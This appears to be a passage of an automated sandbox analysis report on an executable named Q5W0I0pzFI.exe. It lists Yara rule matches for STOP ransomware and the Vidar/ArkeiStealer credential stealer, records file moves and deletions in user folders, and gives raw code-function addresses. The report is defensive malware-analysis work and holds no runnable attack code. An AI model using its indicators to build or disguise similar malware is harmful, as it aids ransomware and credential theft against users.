Source: Yara match	File source: 00000011.00000002.450360097.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000000.416333867.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000000.412392232.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000000.397205913.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Q5W0I0pzFI.exe PID: 6988, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Q5W0I0pzFI.exe PID: 6496, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Q5W0I0pzFI.exe PID: 2420, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Q5W0I0pzFI.exe PID: 2624, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Q5W0I0pzFI.exe PID: 1516, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Q5W0I0pzFI.exe PID: 6452, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Q5W0I0pzFI.exe PID: 6444, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Q5W0I0pzFI.exe PID: 4356, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Q5W0I0pzFI.exe PID: 3884, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Q5W0I0pzFI.exe PID: 4892, type: MEMORYSTR

Modifies existing user documents (likely ransomware behavior)

Source: C:\Users\user\Desktop\Q5W0I0pzFI.exe	File moved: C:\Users\user\Desktop\BPMLNOBVSB\VAMYDFPUND.mp3	Jump to behavior
Source: C:\Users\user\Desktop\Q5W0I0pzFI.exe	File deleted: C:\Users\user\Desktop\BPMLNOBVSB\VAMYDFPUND.mp3	Jump to behavior
Source: C:\Users\user\Desktop\Q5W0I0pzFI.exe	File moved: C:\Users\user\Desktop\FENIVHOIKN\WKXEWIOTXI.xlsx	Jump to behavior
Source: C:\Users\user\Desktop\Q5W0I0pzFI.exe	File deleted: C:\Users\user\Desktop\FENIVHOIKN\WKXEWIOTXI.xlsx	Jump to behavior
Source: C:\Users\user\Desktop\Q5W0I0pzFI.exe	File moved: C:\Users\user\Desktop\FENIVHOIKN\VAMYDFPUND.pdf	Jump to behavior

System Summary

Malicious sample detected (through community Yara rule)

Source: 8.0.Q5W0I0pzFI.exe.400000.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 7.2.Q5W0I0pzFI.exe.22115a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 14.2.build2.exe.21615a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
Source: 14.2.build2.exe.21615a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Vidar / ArkeiStealer Author: ditekSHen
Source: 11.2.Q5W0I0pzFI.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 11.0.Q5W0I0pzFI.exe.400000.10.raw.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 10.2.Q5W0I0pzFI.exe.22f15a0.1.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 8.2.Q5W0I0pzFI.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 2.0.Q5W0I0pzFI.exe.400000.5.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 16.0.build2.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
Source: 16.0.build2.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: Detects Vidar / ArkeiStealer Author: ditekSHen
Source: 11.0.Q5W0I0pzFI.exe.400000.9.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 11.0.Q5W0I0pzFI.exe.400000.9.raw.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 14.2.build2.exe.21615a0.1.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
Source: 14.2.build2.exe.21615a0.1.unpack, type: UNPACKEDPE	Matched rule: Detects Vidar / ArkeiStealer Author: ditekSHen
Source: 2.0.Q5W0I0pzFI.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 11.0.Q5W0I0pzFI.exe.400000.8.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 2.0.Q5W0I0pzFI.exe.400000.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 8.0.Q5W0I0pzFI.exe.400000.9.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 9.0.Q5W0I0pzFI.exe.400000.5.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 16.0.build2.exe.400000.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
Source: 16.0.build2.exe.400000.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Vidar / ArkeiStealer Author: ditekSHen
Source: 8.0.Q5W0I0pzFI.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 0.2.Q5W0I0pzFI.exe.21d15a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 9.0.Q5W0I0pzFI.exe.400000.7.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 2.0.Q5W0I0pzFI.exe.400000.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 9.2.Q5W0I0pzFI.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 8.0.Q5W0I0pzFI.exe.400000.7.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 11.0.Q5W0I0pzFI.exe.400000.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 8.0.Q5W0I0pzFI.exe.400000.8.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 11.0.Q5W0I0pzFI.exe.400000.6.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 17.0.Q5W0I0pzFI.exe.400000.6.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 2.0.Q5W0I0pzFI.exe.400000.10.raw.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 2.0.Q5W0I0pzFI.exe.400000.6.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 9.0.Q5W0I0pzFI.exe.400000.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 9.2.Q5W0I0pzFI.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 17.0.Q5W0I0pzFI.exe.400000.8.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 9.0.Q5W0I0pzFI.exe.400000.9.raw.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 17.0.Q5W0I0pzFI.exe.400000.9.raw.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 8.0.Q5W0I0pzFI.exe.400000.6.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 15.2.Q5W0I0pzFI.exe.22215a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 11.2.Q5W0I0pzFI.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 9.0.Q5W0I0pzFI.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 16.2.build2.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
Source: 16.2.build2.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Vidar / ArkeiStealer Author: ditekSHen
Source: 9.0.Q5W0I0pzFI.exe.400000.10.raw.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 16.0.build2.exe.400000.8.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
Source: 16.0.build2.exe.400000.8.unpack, type: UNPACKEDPE	Matched rule: Detects Vidar / ArkeiStealer Author: ditekSHen
Source: 11.0.Q5W0I0pzFI.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 2.0.Q5W0I0pzFI.exe.400000.9.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 11.0.Q5W0I0pzFI.exe.400000.7.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 16.0.build2.exe.400000.5.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
Source: 16.0.build2.exe.400000.5.unpack, type: UNPACKEDPE	Matched rule: Detects Vidar / ArkeiStealer Author: ditekSHen
Source: 8.0.Q5W0I0pzFI.exe.400000.10.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 17.0.Q5W0I0pzFI.exe.400000.10.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 8.0.Q5W0I0pzFI.exe.400000.8.raw.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 9.0.Q5W0I0pzFI.exe.400000.9.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 7.2.Q5W0I0pzFI.exe.22115a0.1.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 2.0.Q5W0I0pzFI.exe.400000.10.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 16.0.build2.exe.400000.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
Source: 16.0.build2.exe.400000.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Vidar / ArkeiStealer Author: ditekSHen
Source: 2.0.Q5W0I0pzFI.exe.400000.9.raw.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 17.0.Q5W0I0pzFI.exe.400000.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 11.0.Q5W0I0pzFI.exe.400000.5.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 8.0.Q5W0I0pzFI.exe.400000.5.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 6.2.Q5W0I0pzFI.exe.21515a0.1.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 17.0.Q5W0I0pzFI.exe.400000.5.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 2.0.Q5W0I0pzFI.exe.400000.8.raw.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 16.0.build2.exe.400000.8.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
Source: 16.0.build2.exe.400000.8.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Vidar / ArkeiStealer Author: ditekSHen
Source: 8.0.Q5W0I0pzFI.exe.400000.9.raw.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 9.0.Q5W0I0pzFI.exe.400000.8.raw.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 11.0.Q5W0I0pzFI.exe.400000.8.raw.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 9.0.Q5W0I0pzFI.exe.400000.10.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 15.2.Q5W0I0pzFI.exe.22215a0.1.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 16.2.build2.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
Source: 16.2.build2.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Vidar / ArkeiStealer Author: ditekSHen
Source: 2.2.Q5W0I0pzFI.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 2.2.Q5W0I0pzFI.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 16.0.build2.exe.400000.7.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
Source: 16.0.build2.exe.400000.7.unpack, type: UNPACKEDPE	Matched rule: Detects Vidar / ArkeiStealer Author: ditekSHen
Source: 17.2.Q5W0I0pzFI.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 8.0.Q5W0I0pzFI.exe.400000.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 16.0.build2.exe.400000.6.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
Source: 16.0.build2.exe.400000.6.unpack, type: UNPACKEDPE	Matched rule: Detects Vidar / ArkeiStealer Author: ditekSHen
Source: 11.0.Q5W0I0pzFI.exe.400000.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 17.0.Q5W0I0pzFI.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 2.0.Q5W0I0pzFI.exe.400000.7.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 0.2.Q5W0I0pzFI.exe.21d15a0.1.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 11.0.Q5W0I0pzFI.exe.400000.10.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 17.0.Q5W0I0pzFI.exe.400000.8.raw.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 10.2.Q5W0I0pzFI.exe.22f15a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 17.0.Q5W0I0pzFI.exe.400000.9.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 8.0.Q5W0I0pzFI.exe.400000.10.raw.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 9.0.Q5W0I0pzFI.exe.400000.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 17.2.Q5W0I0pzFI.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 17.0.Q5W0I0pzFI.exe.400000.7.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 9.0.Q5W0I0pzFI.exe.400000.8.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 9.0.Q5W0I0pzFI.exe.400000.6.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 6.2.Q5W0I0pzFI.exe.21515a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 17.0.Q5W0I0pzFI.exe.400000.10.raw.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 17.0.Q5W0I0pzFI.exe.400000.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 2.0.Q5W0I0pzFI.exe.400000.8.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 8.2.Q5W0I0pzFI.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 00000008.00000002.627888842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 00000011.00000000.440924056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 00000010.00000000.440544094.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
Source: 00000010.00000000.440544094.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Vidar / ArkeiStealer Author: ditekSHen
Source: 00000011.00000000.442768730.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 00000008.00000000.396193499.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 0000000B.00000000.413315089.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 00000008.00000000.396613760.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 00000002.00000000.369557747.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 00000002.00000002.380176019.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 00000009.00000000.409130512.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 00000010.00000000.440042728.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
Source: 00000010.00000000.440042728.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Vidar / ArkeiStealer Author: ditekSHen
Source: 0000000B.00000000.417180790.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 00000010.00000000.441196646.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
Source: 00000010.00000000.441196646.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Vidar / ArkeiStealer Author: ditekSHen
Source: 00000009.00000002.440072220.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 00000002.00000000.370049298.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 00000010.00000002.536453071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
Source: 00000010.00000002.536453071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Vidar / ArkeiStealer Author: ditekSHen
Source: 00000011.00000000.444362220.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 00000008.00000000.397769175.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 00000011.00000000.443754682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 00000002.00000000.368979177.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 00000009.00000000.410741803.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 00000008.00000000.395607853.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 00000009.00000000.410091603.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 0000000B.00000000.413797668.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 0000000B.00000000.414793604.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 0000000B.00000002.427127192.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 00000011.00000000.441751183.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 00000002.00000000.368447037.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 00000002.00000000.370467390.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 00000009.00000000.411271784.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 00000011.00000002.450360097.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 0000000B.00000000.416333867.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 00000009.00000000.412392232.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 00000008.00000000.397205913.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects STOP ransomware Author: ditekSHen

Source: C:\Users\user\Desktop\Q5W0I0pzFI.exe	Code function: 0_2_0041A880	0_2_0041A880
Source: C:\Users\user\Desktop\Q5W0I0pzFI.exe	Code function: 0_2_00419AA0	0_2_00419AA0
Source: C:\Users\user\Desktop\Q5W0I0pzFI.exe	Code function: 2_2_0040D240	2_2_0040D240
Source: C:\Users\user\Desktop\Q5W0I0pzFI.exe	Code function: 2_2_00419F90	2_2_00419F90
Source: C:\Users\user\Desktop\Q5W0I0pzFI.exe	Code function: 2_2_0040C070	2_2_0040C070
Source: C:\Users\user\Desktop\Q5W0I0pzFI.exe	Code function: 2_2_0042E003	2_2_0042E003
Source: C:\Users\user\Desktop\Q5W0I0pzFI.exe	Code function: 2_2_0042F010	2_2_0042F010
Source: C:\Users\user\Desktop\Q5W0I0pzFI.exe	Code function: 2_2_00410160	2_2_00410160
Source: C:\Users\user\Desktop\Q5W0I0pzFI.exe	Code function: 2_2_0044237E	2_2_0044237E
Source: C:\Users\user\Desktop\Q5W0I0pzFI.exe	Code function: 2_2_004344FF	2_2_004344FF
Source: C:\Users\user\Desktop\Q5W0I0pzFI.exe	Code function: 2_2_00449506	2_2_00449506
Source: C:\Users\user\Desktop\Q5W0I0pzFI.exe	Code function: 2_2_0043E5A3	2_2_0043E5A3
Source: C:\Users\user\Desktop\Q5W0I0pzFI.exe	Code function: 2_2_0044B5B1	2_2_0044B5B1
Source: C:\Users\user\Desktop\Q5W0I0pzFI.exe	Code function: 2_2_0040A660	2_2_0040A660
Source: C:\Users\user\Desktop\Q5W0I0pzFI.exe	Code function: 2_2_0041E690	2_2_0041E690
Source: C:\Users\user\Desktop\Q5W0I0pzFI.exe	Code function: 2_2_0040274E	2_2_0040274E
Source: C:\Users\user\Desktop\Q5W0I0pzFI.exe	Code function: 2_2_0040A710	2_2_0040A710
Source: C:\Users\user\Desktop\Q5W0I0pzFI.exe	Code function: 2_2_0040F730	2_2_0040F730
Source: C:\Users\user\Desktop\Q5W0I0pzFI.exe	Code function: 2_2_0044D7A1	2_2_0044D7A1
Source: C:\Users\user\Desktop\Q5W0I0pzFI.exe	Code function: 2_2_0042C804	2_2_0042C804
Source: C:\Users\user\Desktop\Q5W0I0pzFI.exe	Code function: 2_2_0044D9DC	2_2_0044D9DC
Source: C:\Users\user\Desktop\Q5W0I0pzFI.exe	Code function: 2_2_00449A71	2_2_00449A71
Source: C:\Users\user\Desktop\Q5W0I0pzFI.exe	Code function: 2_2_00443B40	2_2_00443B40
Source: C:\Users\user\Desktop\Q5W0I0pzFI.exe	Code function: 2_2_0044ACFF	2_2_0044ACFF
Source: C:\Users\user\Desktop\Q5W0I0pzFI.exe	Code function: 2_2_0040DD40	2_2_0040DD40
Source: C:\Users\user\Desktop\Q5W0I0pzFI.exe	Code function: 2_2_0040BDC0	2_2_0040BDC0
Source: C:\Users\user\Desktop\Q5W0I0pzFI.exe	Code function: 2_2_0042CE51	2_2_0042CE51
Source: C:\Users\user\Desktop\Q5W0I0pzFI.exe	Code function: 2_2_00420F30	2_2_00420F30
Source: C:\Users\user\Desktop\Q5W0I0pzFI.exe	Code function: 2_2_00449FE3	2_2_00449FE3
Source: C:\Users\user\Desktop\Q5W0I0pzFI.exe	Code function: 6_2_0215CA10	6_2_0215CA10
Source: C:\Users\user\Desktop\Q5W0I0pzFI.exe	Code function: 6_2_02160B00	6_2_02160B00
Source: C:\Users\user\Desktop\Q5W0I0pzFI.exe	Code function: 6_2_0215DBE0	6_2_0215DBE0
Source: C:\Users\user\Desktop\Q5W0I0pzFI.exe	Code function: 6_2_0215B000	6_2_0215B000
Source: C:\Users\user\Desktop\Q5W0I0pzFI.exe	Code function: 6_2_0215B0B0	6_2_0215B0B0
Source: C:\Users\user\Desktop\Q5W0I0pzFI.exe	Code function: 6_2_021600D0	6_2_021600D0
Source: C:\Users\user\Desktop\Q5W0I0pzFI.exe	Code function: 6_2_021718D0	6_2_021718D0
Source: C:\Users\user\Desktop\Q5W0I0pzFI.exe	Code function: 6_2_021530EE	6_2_021530EE
Source: C:\Users\user\Desktop\Q5W0I0pzFI.exe	Code function: 6_2_0217F9B0	6_2_0217F9B0
Source: C:\Users\user\Desktop\Q5W0I0pzFI.exe	Code function: 6_2_0217E9A3	6_2_0217E9A3
Source: C:\Users\user\Desktop\Q5W0I0pzFI.exe	Code function: 6_2_0215E6E0	6_2_0215E6E0
Source: C:\Users\user\Desktop\Q5W0I0pzFI.exe	Code function: 6_2_0215C760	6_2_0215C760
Source: C:\Users\user\AppData\Local\a760d531-7692-44a9-9184-9844c48a2eda\Q5W0I0pzFI.exe	Code function: 7_2_0221CA10	7_2_0221CA10
Source: C:\Users\user\AppData\Local\a760d531-7692-44a9-9184-9844c48a2eda\Q5W0I0pzFI.exe	Code function: 7_2_02220B00	7_2_02220B00
Source: C:\Users\user\AppData\Local\a760d531-7692-44a9-9184-9844c48a2eda\Q5W0I0pzFI.exe	Code function: 7_2_0221DBE0	7_2_0221DBE0
Source: C:\Users\user\AppData\Local\a760d531-7692-44a9-9184-9844c48a2eda\Q5W0I0pzFI.exe	Code function: 7_2_0221B000	7_2_0221B000
Source: C:\Users\user\AppData\Local\a760d531-7692-44a9-9184-9844c48a2eda\Q5W0I0pzFI.exe	Code function: 7_2_0221B0B0	7_2_0221B0B0
Source: C:\Users\user\AppData\Local\a760d531-7692-44a9-9184-9844c48a2eda\Q5W0I0pzFI.exe	Code function: 7_2_022130EE	7_2_022130EE
Source: C:\Users\user\AppData\Local\a760d531-7692-44a9-9184-9844c48a2eda\Q5W0I0pzFI.exe	Code function: 7_2_022200D0	7_2_022200D0
Source: C:\Users\user\AppData\Local\a760d531-7692-44a9-9184-9844c48a2eda\Q5W0I0pzFI.exe	Code function: 7_2_022318D0	7_2_022318D0
Source: C:\Users\user\AppData\Local\a760d531-7692-44a9-9184-9844c48a2eda\Q5W0I0pzFI.exe	Code function: 7_2_0223E9A3	7_2_0223E9A3
Source: C:\Users\user\AppData\Local\a760d531-7692-44a9-9184-9844c48a2eda\Q5W0I0pzFI.exe	Code function: 7_2_0223F9B0	7_2_0223F9B0
Source: C:\Users\user\AppData\Local\a760d531-7692-44a9-9184-9844c48a2eda\Q5W0I0pzFI.exe	Code function: 7_2_0221E6E0	7_2_0221E6E0
Source: C:\Users\user\AppData\Local\a760d531-7692-44a9-9184-9844c48a2eda\Q5W0I0pzFI.exe	Code function: 7_2_0221C760	7_2_0221C760
